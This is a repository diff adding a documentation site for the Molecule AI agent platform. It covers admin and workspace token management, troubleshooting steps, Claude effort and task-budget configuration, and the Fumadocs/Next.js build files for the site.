| `GET /admin/workspaces` | List all workspaces |
| `POST /admin/workspaces/:id/pause` | Pause a workspace |
| `POST /admin/workspaces/:id/resume` | Resume a workspace |
| `POST /admin/workspaces/:id/terminate` | Force-terminate a container |
| `GET /admin/metrics` | Platform-level metrics |
| `POST /admin/tier-promote` | Promote a workspace to a higher tier |
## What happens if ADMIN_TOKEN is missing
In deployments where `ADMIN_TOKEN` is **unset** (empty string or not present in
the environment), the `AdminAuth` middleware currently **fail-opens** — it allows
all requests through without credential validation.
This fail-open behavior exists for backward compatibility during the transition
period but **will be removed**. After April 22, 2026, requests to `/admin/*`
endpoints without a valid `ADMIN_TOKEN` will return `401 Unauthorized`.
## Verifying your setup
Check that `ADMIN_TOKEN` is present and working:
```bash
curl -s -H "Authorization: Bearer $ADMIN_TOKEN" \
http://localhost:8080/admin/workspaces | jq '.count'
```
If the response is `401`, the token is missing or incorrect. If you get a JSON
payload with a `count` field, the token is working.
## Rotating ADMIN_TOKEN
To rotate without downtime:
1. **Deploy** the new token: `fly secrets set ADMIN_TOKEN="new-token" && fly deploy`
2. **Verify** the new token works (see above)
3. **Note:** the `fly secrets set` in step 1 already replaced the previous
   value — Fly does not retain old secret values, so no separate removal
   step is needed.
## Related
- [Self-Hosting overview](/docs/self-hosting) — full deployment guide
- [Security Configuration](/docs/self-hosting#security-configuration) — other
production security variables

115
content/docs/tokens.mdx Normal file
View File

@ -0,0 +1,115 @@
---
title: Token Management
description: Create, list, and revoke workspace bearer tokens for API authentication.
---
Workspace bearer tokens authenticate agents and API clients against the
Molecule AI platform. Each token is scoped to a single workspace — a token
from workspace A cannot access workspace B.
## Endpoints
All endpoints are behind `WorkspaceAuth` middleware — you need an existing
valid token to manage tokens. The first token is issued during workspace
registration (`POST /registry/register`).
### List tokens
```bash
GET /workspaces/:id/tokens
Authorization: Bearer <token>
```
Returns non-revoked tokens. Only metadata is returned — never the plaintext or hash.
```json
{
"tokens": [
{
"id": "uuid-of-token-row",
"prefix": "abc12345",
"created_at": "2026-04-16T12:00:00Z",
"last_used_at": "2026-04-16T15:30:00Z"
}
],
"count": 1
}
```
### Create token
```bash
POST /workspaces/:id/tokens
Authorization: Bearer <token>
```
Mints a new token. The plaintext is returned **exactly once** — save it immediately.
```json
{
"auth_token": "dGhpcyBpcyBhIHRlc3QgdG9rZW4...",
"workspace_id": "ws-uuid",
"message": "Save this token now — it cannot be retrieved again."
}
```
### Revoke token
```bash
DELETE /workspaces/:id/tokens/:tokenId
Authorization: Bearer <token>
```
Revokes a specific token by its database ID (from the List response).
```json
{
"status": "revoked"
}
```
Returns 404 if the token doesn't exist, belongs to a different workspace, or
is already revoked.
## Token rotation
To rotate credentials without downtime:
1. **Create** a new token: `POST /workspaces/:id/tokens`
2. **Update** your agent to use the new token
3. **Verify** the new token works (check `last_used_at` in List)
4. **Revoke** the old token: `DELETE /workspaces/:id/tokens/:oldTokenId`
## Bootstrap — getting your first token
The first token is issued during workspace registration:
```bash
# 1. Create workspace
curl -X POST http://localhost:8080/workspaces \
-H "Content-Type: application/json" \
-d '{"name": "My Agent", "tier": 2}'
# 2. Register (returns auth_token)
curl -X POST http://localhost:8080/registry/register \
-H "Content-Type: application/json" \
-d '{"workspace_id": "<id>", "url": "http://...", "agent_card": {...}}'
```
For local development, the test-token endpoint is also available (disabled in production):
```bash
curl http://localhost:8080/admin/workspaces/<id>/test-token
```
## Security properties
| Property | Detail |
|---|---|
| Entropy | 256-bit (32 random bytes, base64url-encoded) |
| Storage | sha256 hash only — plaintext never persisted |
| Scope | Per-workspace — token A cannot auth workspace B |
| Display | Shown once at creation, not recoverable |
| Prefix | First 8 characters stored for log correlation |
| Expiration | None — tokens are permanent until revoked |
| Auto-revoke | All tokens revoked when workspace is deleted |

View File

@ -0,0 +1,164 @@
---
title: Troubleshooting
description: Common issues and how to fix them.
---
## Workspace Stuck in "Provisioning"
A workspace that stays in `provisioning` for more than 30 seconds usually indicates a container startup failure.
**Steps to diagnose:**
1. Check Docker logs for the workspace container:
```bash
docker logs <container-id>
```
2. Verify the workspace image exists locally:
```bash
docker images | grep workspace-template
```
3. Check tier resource limits -- the container may be OOM-killed on start. Review `TIER2_MEMORY_MB` / `TIER3_MEMORY_MB` / `TIER4_MEMORY_MB` values.
4. Ensure the platform can reach the Docker daemon (Docker Desktop must be running).
## 401 Unauthorized on API Calls
Bearer tokens can expire or be revoked. Workspace tokens are also auto-revoked when a workspace is deleted.
**Resolution:**
- For workspace-scoped endpoints, mint a new token:
```bash
# Development/staging only (hidden when MOLECULE_ENV=production)
curl http://localhost:8080/admin/workspaces/:id/test-token
```
- For admin endpoints, verify your token is still valid against a known-good endpoint like `GET /health`.
- Legacy workspaces (created before Phase 30.1) are grandfathered and do not require tokens on heartbeat/update-card routes.
## WebSocket Shows "Reconnecting"
The canvas WebSocket connection (`/ws`) drops and retries.
**Common causes:**
- `CORS_ORIGINS` does not include your domain -- the WebSocket upgrade is rejected. Add your origin to the comma-separated list.
- A reverse proxy or firewall is terminating the long-lived connection. Ensure WebSocket upgrade headers are forwarded.
- The platform process crashed or restarted. Check platform logs.
**Verify connectivity:**
```bash
# Quick check that the WS endpoint is reachable
curl -i -N \
-H "Connection: Upgrade" \
-H "Upgrade: websocket" \
-H "Sec-WebSocket-Version: 13" \
-H "Sec-WebSocket-Key: dGVzdA==" \
http://localhost:8080/ws
```
## Agent Not Responding to A2A
When one agent cannot reach another via the A2A proxy (`POST /workspaces/:id/a2a`), check communication rules.
**The `CanCommunicate` access check allows:**
- Same workspace (self-call)
- Siblings (same parent)
- Root-level siblings (both have no parent)
- Parent to child or child to parent
**Everything else is denied.** If two agents need to communicate, they must be in the same subtree.
**Also verify:**
- The target workspace is `online` (not `paused`, `offline`, or `provisioning`)
- The target's heartbeat is fresh (Redis TTL has not expired)
- The caller includes `X-Workspace-ID` and `Authorization: Bearer <token>` headers
## Schedule Not Firing
Cron schedules are managed by the platform scheduler subsystem.
**Checklist:**
- Verify the cron expression is valid (standard 5-field cron syntax)
- Confirm the workspace is `online` -- paused workspaces skip all schedules
- Check if the schedule was `skipped` due to concurrency: the scheduler skips when `active_tasks > 0`. Review schedule history:
```
GET /workspaces/:id/schedules/:scheduleId/history
```
- Inspect `GET /admin/liveness` to ensure the scheduler subsystem is alive (age should be under 60 seconds)
## Channel Test Fails
Social channel integrations (Telegram, Slack, etc.) can fail for several reasons.
**Diagnose:**
- Verify the bot token is correct and has not been revoked by the platform provider
- Check the allowlist config in the channel's JSONB settings -- messages from non-allowlisted chats are silently dropped
- Ensure the webhook URL is registered with the external platform:
```
POST /webhooks/:type
```
This is the endpoint the external platform (Telegram, Slack) should send events to.
- Test the connection explicitly:
```
POST /workspaces/:id/channels/:channelId/test
```
## Migration Crash on Boot
The platform runs all `*.up.sql` migrations on every startup (there is no `schema_migrations` tracking table yet).
**Common issues:**
- Migrations must be idempotent (`CREATE TABLE IF NOT EXISTS`, `ALTER TABLE ... IF NOT EXISTS`). If a migration lacks this guard, the second boot fails.
- Before PR #212, the migration runner did not filter `.down.sql` files, causing tables to be dropped on every boot. Ensure you are running a platform version that includes this fix.
- If you see errors about duplicate columns or tables, the migration is not idempotent. Patch the `.up.sql` file to add `IF NOT EXISTS` guards.
## Canvas Blank or 502 on Tenant Deploy
In tenant mode (`platform/Dockerfile.tenant`), the Go server proxies canvas requests.
**Verify:**
- `CANVAS_PROXY_URL` is set and points to the running Next.js process inside the container
- Both the Go server and the Node.js process are running (check container logs for both)
- The Next.js build completed successfully during `docker build`
## Plugin Install Timeout
Large plugins or slow network connections can exceed the default fetch deadline.
**Adjust limits:**
| Variable | Default | Description |
|----------|---------|-------------|
| `PLUGIN_INSTALL_FETCH_TIMEOUT` | `5m` | Increase for large or remote plugins |
| `PLUGIN_INSTALL_MAX_DIR_BYTES` | `104857600` (100 MiB) | Increase if the plugin tree exceeds 100 MiB |
| `PLUGIN_INSTALL_BODY_MAX_BYTES` | `65536` (64 KiB) | Increase if the install request body is large |
## Memory or Disk Usage Growing
Activity logs and structure events accumulate over time.
**Tune retention:**
- `ACTIVITY_RETENTION_DAYS` (default `7`) -- reduce to 3 or even 1 for high-traffic deployments
- `ACTIVITY_CLEANUP_INTERVAL_HOURS` (default `6`) -- reduce to run cleanup more frequently
- Monitor the `activity_logs` and `structure_events` tables directly if disk usage is a concern:
```sql
SELECT pg_size_pretty(pg_total_relation_size('activity_logs'));
SELECT pg_size_pretty(pg_total_relation_size('structure_events'));
```
## Container Health Detection
If workspaces go offline unexpectedly (e.g., Docker Desktop crash), three layers detect the failure:
1. **Passive (Redis TTL):** 60-second heartbeat key expires, liveness monitor triggers auto-restart
2. **Proactive (Health Sweep):** Docker API polled every 15 seconds, catches dead containers faster than TTL expiry
3. **Reactive (A2A Proxy):** On connection error to a workspace, checks `provisioner.IsRunning()` and triggers immediate offline + restart
If none of these are catching a dead container, check `GET /admin/liveness` to verify the health sweep and liveness monitor subsystems are running.

View File

@ -1,3 +1,6 @@
---
title: "Provisioning Workspaces on Fly Machines (CONTAINER_BACKEND=flyio)"
---
# Provisioning Workspaces on Fly Machines (CONTAINER_BACKEND=flyio)
Molecule AI can provision agent workspaces on [Fly Machines](https://fly.io/docs/machines/) instead of local Docker containers. When `CONTAINER_BACKEND=flyio` is set, every `POST /workspaces` creates a Fly Machine and boots the workspace agent inside it — with tier-based resource limits, env-var injection, and A2A registration handled automatically. The platform manages the workspace (lifecycle, auth, routing); Fly manages the machine it runs on.

View File

@ -1,3 +1,6 @@
---
title: "Running a Gemini CLI Workspace on Molecule AI"
---
# Running a Gemini CLI Workspace on Molecule AI
Molecule AI now ships a `gemini-cli` runtime adapter alongside the existing `claude-code` adapter. This tutorial walks you from zero to a running Gemini agent workspace in under five minutes.

View File

@ -1,3 +1,6 @@
---
title: "Running a Google ADK Workspace on Molecule AI"
---
# Running a Google ADK Workspace on Molecule AI
Google's Agent Development Kit (ADK) is now a first-class runtime on Molecule AI. This tutorial walks you from zero to a running ADK agent workspace — one that persists per-conversation session state and sits alongside your Claude Code and Gemini CLI workers in the same A2A network.

View File

@ -1,3 +1,6 @@
---
title: "Hermes Multi-Provider Dispatch: Native Anthropic, Gemini, and Multi-Turn History"
---
# Hermes Multi-Provider Dispatch: Native Anthropic, Gemini, and Multi-Turn History
Hermes is Molecule AI's inference router. Out of the box it proxies every model through an OpenAI-compatible shim. That works for plain text, but the shim does format translation on every round-trip — and it gets the Gemini message format wrong (Gemini expects `role: "model"` and a `parts: [{text}]` wrapper; the shim passes `role: "assistant"` and a flat string). It also flattens multi-turn conversations into a single user blob, losing role attribution across turns.

View File

@ -1,3 +1,6 @@
---
title: "Connecting an AI Agent to Lark / Feishu"
---
# Connecting an AI Agent to Lark / Feishu
Molecule AI's Lark channel adapter (shipped in #480) lets any workspace agent

View File

@ -1,3 +1,6 @@
---
title: "Register a Remote Agent on Molecule AI"
---
# Register a Remote Agent on Molecule AI
Remote agents let you connect AI agents running on *any* infrastructure — your laptop, a cloud VM, a CI/CD pipeline, or an on-premise server — to a single Molecule AI canvas. Your agent keeps running wherever it lives; the canvas gives you fleet-wide visibility, secret management, and cross-network A2A messaging from one place.

View File

@ -0,0 +1,166 @@
---
title: Workspace Configuration
description: Configure workspaces via config.yaml — runtime, model, tier, and Claude-specific settings including effort levels and task budget for Claude Opus 4.7.
---
import { Callout } from 'fumadocs-ui/components/callout';
# Workspace Configuration
Every Molecule AI workspace is backed by a `config.yaml` file. The **Config tab** in the canvas lets you edit this file through a structured form or in raw YAML mode. Changes take effect on the next workspace restart.
---
## Opening the Config tab
1. Click any workspace node on the canvas to open its sidebar
2. Select the **Config** tab
3. Edit fields in the form view, or toggle **Raw YAML** in the top-right to edit `config.yaml` directly
4. Click **Save** to write the file, or **Save & Restart** to apply changes immediately
---
## Claude Settings
The **Claude Settings** section of the Config tab exposes two primitives from the Claude Opus 4.7 API: **effort level** and **task budget**. These control how much reasoning work Claude does per turn — trading cost and latency for output quality.
<Callout type="info">
**Availability:** Claude Settings are only shown for workspaces running `runtime: claude-code` or using a model whose name includes `claude` or `anthropic`. The section is hidden for other runtimes and models.
</Callout>
The section is collapsed by default. Click **Claude Settings** to expand it.
---
## Effort levels
The **Effort** dropdown sets `output_config.effort` on the Claude Messages API call for every turn in this workspace.
| Value | Label | What it does | When to use |
|---|---|---|---|
| *(unset)* | — model default — | No `effort` field sent; Claude uses its built-in default | Everyday tasks where you want Claude to decide |
| `low` | low | Minimal reasoning steps; fastest response, lowest cost | Quick lookups, simple rewrites, high-throughput pipelines where latency matters |
| `medium` | medium | Balanced reasoning; Claude's typical quality for most tasks | General coding, writing, Q&A — a good starting point |
| `high` | high | More deliberate reasoning; higher quality, higher cost | Code review, architecture decisions, nuanced analysis |
| `xhigh` | xhigh (extended thinking) | **Activates extended thinking.** Claude works through the problem step-by-step before producing a final answer | Complex multi-step problems, hard debugging, long-range planning |
| `max` | max — absolute ceiling | Maximum possible effort; extended thinking at full depth | Research-grade reasoning, competitive benchmarks, correctness-critical tasks where cost is not a constraint |
### Tradeoffs
Higher effort levels improve output quality at the cost of latency and token spend:
- **Cost** scales roughly with reasoning depth. `max` can produce significantly more tokens than `low` on the same prompt.
- **Latency** increases with effort because Claude takes more reasoning steps before responding.
- **Quality** gains are most pronounced on tasks that require multi-step planning or where incorrect reasoning compounds (code generation, analysis, math).
For most workspaces, leaving effort **unset** or at **medium** is the right default. Move to `high` or above for specialist worker agents that handle tasks where errors are expensive — a security auditor, an architect, a final reviewer.
<Callout type="warn">
`xhigh` and `max` activate **extended thinking**, which is only available on **Claude Opus 4.7** and later. Using these levels with earlier models or other providers will return an API error.
</Callout>
---
## Task budget
The **Task Budget** field sets a token ceiling on how much thinking work Claude is allowed to do per turn. It maps to `output_config.task_budget.total` in the Messages API.
| Field | Type | Default | Minimum |
|---|---|---|---|
| `task_budget` | integer (tokens) | 0 (unset) | 20,000 when set |
**0 means unset** — no `task_budget` field is sent and Claude uses its own internal limit.
When set to a non-zero value, Claude will not exceed that many tokens of thinking/reasoning per turn. This lets you cap spend on a per-workspace basis without changing the effort level.
### When task budget applies
Task budget only has an effect when:
1. The workspace is running `runtime: claude-code` or a `claude`/`anthropic` model
2. The beta header `task-budgets-2026-03-13` is enabled (see [Beta header](#beta-header-requirement) below)
3. The effort level is `xhigh` or `max` (extended thinking must be active for the budget to be exercised)
Setting a `task_budget` on a `low`/`medium`/`high` effort workspace is harmless — it will be sent but has no practical effect without extended thinking active.
### Guidance
- **20,000 tokens** is the beta minimum. Values below this are ignored by the API.
- **50,000–100,000 tokens** covers most complex coding and analysis tasks.
- **200,000+ tokens** is appropriate for research-grade or competitive-benchmark workloads.
- A tighter budget reduces cost on `xhigh`/`max` workspaces but may truncate reasoning on very hard problems. Watch your workspace metrics and adjust if you see quality regressions.
<Callout type="info">
**Executor wiring — coming in the next release.** The Config tab writes `effort` and `task_budget` to `config.yaml` today (PRs #639 and #654). The workspace executor that reads these values and passes them to the Claude SDK is tracked on the workspace-template side and will ship in the next release. Until that lands, the config is stored and visible but does not yet affect inference.
</Callout>
---
## config.yaml reference
Both fields serialize as top-level keys in `config.yaml`:
```yaml title="config.yaml — effort + task_budget examples"
name: Senior Reviewer
runtime: claude-code
model: anthropic:claude-opus-4-7
role: |
You are a senior engineer performing code review. Be thorough.
tier: 3
# Claude Settings
effort: high
task_budget: 0 # 0 = unset; omitted from API call
```
```yaml title="config.yaml — extended thinking at a fixed budget"
name: Architect
runtime: claude-code
model: anthropic:claude-opus-4-7
role: |
You design systems. Think deeply before recommending an architecture.
tier: 3
effort: xhigh
task_budget: 80000 # cap thinking at 80k tokens per turn
```
```yaml title="config.yaml — max effort, no budget cap"
name: Research Agent
runtime: claude-code
model: anthropic:claude-opus-4-7
role: |
You conduct research. Quality is the only constraint.
tier: 4
effort: max
# task_budget omitted — no ceiling on reasoning depth
```
When `task_budget` is `0`, `toYaml()` omits it from the file entirely — the field only appears in `config.yaml` when it holds a positive value.
---
## Beta header requirement
The `task_budget` feature requires the Anthropic API beta header:
```
anthropic-beta: task-budgets-2026-03-13
```
This header is added automatically by the workspace executor when `task_budget > 0` is present in `config.yaml`. You do not need to set it manually in your workspace config — it is an implementation detail of the executor, not a user-configurable option.
<Callout type="warn">
If you call the Anthropic Messages API directly (outside of a Molecule AI workspace), you must include `anthropic-beta: task-budgets-2026-03-13` in your request headers for `output_config.task_budget` to take effect. Omitting it causes the parameter to be silently ignored.
</Callout>
---
## See also
- [Concepts — Workspaces](/docs/concepts#workspaces) — workspace primitives overview
- [Org Template](/docs/org-template) — deploy effort/task_budget settings across an entire team via `org.yaml`
- [Observability](/docs/observability) — monitor token usage per workspace to tune your budget settings
- [API Reference — POST /workspaces](/docs/api-reference#post-workspaces)
- [Claude Opus 4.7 — Anthropic docs](https://docs.anthropic.com) — upstream reference for `output_config`

7
lib/source.ts Normal file
View File

@ -0,0 +1,7 @@
import { docs } from '@/.source/server';
import { loader } from 'fumadocs-core/source';

// Adapt the fumadocs-mdx generated output into the shape loader() expects.
const docsSource = docs.toFumadocsSource();

/**
 * Shared content source for the docs site. App routes and navigation
 * components read pages and the page tree from this loader; every page
 * is served under the /docs base path.
 */
export const source = loader({
  baseUrl: '/docs',
  source: docsSource,
});

9
mdx-components.tsx Normal file
View File

@ -0,0 +1,9 @@
import defaultMdxComponents from 'fumadocs-ui/mdx';
import type { MDXComponents } from 'mdx/types';

/**
 * Build the component map used when rendering MDX pages.
 *
 * Starts from the Fumadocs default components and layers any
 * caller-supplied overrides on top — later keys win, so a page can
 * replace individual defaults without redefining the whole map.
 *
 * @param components Optional per-call overrides; omitted means "defaults only".
 * @returns The merged MDX component map.
 */
export function getMDXComponents(components?: MDXComponents): MDXComponents {
  const overrides = components ?? {};
  return { ...defaultMdxComponents, ...overrides };
}

10
next.config.mjs Normal file
View File

@ -0,0 +1,10 @@
import { createMDX } from 'fumadocs-mdx/next';

/** @type {import('next').NextConfig} */
const nextConfig = {
  reactStrictMode: true,
};

// Wrap the Next.js config so fumadocs-mdx can compile .md/.mdx content
// (and emit the .source directory) as part of the build.
export default createMDX()(nextConfig);

5625
package-lock.json generated Normal file

File diff suppressed because it is too large Load Diff

31
package.json Normal file
View File

@ -0,0 +1,31 @@
{
"name": "molecule-docs",
"version": "0.1.0",
"private": true,
"description": "Molecule AI documentation site — doc.moleculesai.app",
"scripts": {
"build": "next build",
"dev": "next dev",
"start": "next start",
"postinstall": "fumadocs-mdx",
"lint": "next lint"
},
"dependencies": {
"fumadocs-core": "^16.7.16",
"fumadocs-mdx": "^14.3.0",
"fumadocs-ui": "^16.7.16",
"next": "^16.2.4",
"react": "^19.2.5",
"react-dom": "^19.2.5"
},
"devDependencies": {
"@tailwindcss/postcss": "^4.2.2",
"@types/mdx": "^2.0.13",
"@types/node": "^22.0.0",
"@types/react": "^19.2.14",
"@types/react-dom": "^19.2.3",
"postcss": "^8.5.10",
"tailwindcss": "^4.2.2",
"typescript": "^5.6.3"
}
}

5
postcss.config.mjs Normal file
View File

@ -0,0 +1,5 @@
// PostCSS pipeline: Tailwind CSS v4 is driven entirely through its
// dedicated PostCSS plugin — no extra options needed.
const config = {
  plugins: {
    '@tailwindcss/postcss': {},
  },
};

export default config;

11
source.config.ts Normal file
View File

@ -0,0 +1,11 @@
import { defineConfig, defineDocs } from 'fumadocs-mdx/config';

// Docs collection: every .md/.mdx file under content/docs becomes a page.
export const docs = defineDocs({ dir: 'content/docs' });

// Global fumadocs-mdx build options. Remark/rehype plugins belong under
// mdxOptions when the pipeline needs extending.
const mdxConfig = defineConfig({
  mdxOptions: {},
});

export default mdxConfig;

41
tsconfig.json Normal file
View File

@ -0,0 +1,41 @@
{
"compilerOptions": {
"target": "ES2022",
"lib": [
"dom",
"dom.iterable",
"esnext"
],
"allowJs": true,
"skipLibCheck": true,
"strict": true,
"noEmit": true,
"esModuleInterop": true,
"module": "esnext",
"moduleResolution": "Bundler",
"resolveJsonModule": true,
"isolatedModules": true,
"jsx": "react-jsx",
"incremental": true,
"plugins": [
{
"name": "next"
}
],
"paths": {
"@/*": [
"./*"
]
}
},
"include": [
"next-env.d.ts",
"**/*.ts",
"**/*.tsx",
".next/types/**/*.ts",
".next/dev/types/**/*.ts"
],
"exclude": [
"node_modules"
]
}